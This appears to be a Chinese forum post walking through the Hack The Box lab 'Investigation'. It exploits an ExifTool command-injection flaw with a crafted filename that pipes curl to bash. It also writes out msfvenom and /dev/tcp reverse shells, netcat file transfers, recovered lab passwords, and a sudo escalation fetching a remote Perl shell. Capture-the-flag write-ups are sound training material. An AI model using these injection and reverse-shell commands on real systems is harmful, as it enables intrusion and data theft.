首页
社区
课程
招聘
[原创]HTB Investigation (MEDIUM)
发表于: 2023-1-29 17:34 609

[原创]HTB Investigation (MEDIUM)

2023-1-29 17:34
609

上来还是先进行信息收集
图片描述
还是只开了22和80
图片描述
上传一个jpg文件来分析,存在文件上传
图片描述
可以发现
ExifTool Version Number : 12.37
经过信息收集可以找到ExifTool相关漏洞
https://gist.github.com/ert-plus/1414276e4cb5d56dd431c2f0429e4429
ExifTool < 12.38 存在操作系统命令执行
图片描述
确认漏洞存在
传个马上去
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.16.10 LPORT=9876 -f elf > r.elf
图片描述
直接上传文件的方式失败

1
2
3
echo "sh -i >& /dev/tcp/10.10.16.10/9876 0>&1" > index.html
python3 -m http.server 80 
filename="curl 10.10.16.10 | bash |"

获得www-data的shell
图片描述
图片描述
没有权限去拿flag
进行信息收集,有些配置文件可能会叫msg类似的名

1
2
find /usr/local/ -name '*msg*'
/usr/local/investigation/Windows Event Logs for Analysis.msg
1
2
nc -w 3 10.10.16.10 6666 < 'Windows Event Logs for Analysis.msg'
nc -lp 6666 > 'Windows Event Logs for Analysis.msg'

图片描述
https://www.encryptomatic.com/viewer/
在网站上查看msg文件
图片描述
获得压缩包,解压后的文件win上可以直接打开查看,但是不好找到关键信息
有关evtx的信息
https://andreafortuna.org/2017/10/20/windows-event-logs-in-forensic-analysis/
图片描述
在事件ID为4625 登录失败中找到了密码
Def@ultf0r3nz!csPa$$
图片描述
登录成功
图片描述
我们可以在这个目录下 /usr/bin/binary 不使用密码以root权限执行程序
本机创建root.pl写入shell
https://www.revshells.com/
图片描述
一直执行不成功,后发现是/usr/bin/binary中有密码lDnxUysaQn

1
2
nc -w 3 10.10.16.10 6666 /usr/bin/binary
nc -lp 6666 > '123'

图片描述

1
sudo /usr/bin/binary http://10.10.16.10/shellxx.pl lDnxUysaQn

图片描述


[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

收藏
免费 1
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回
//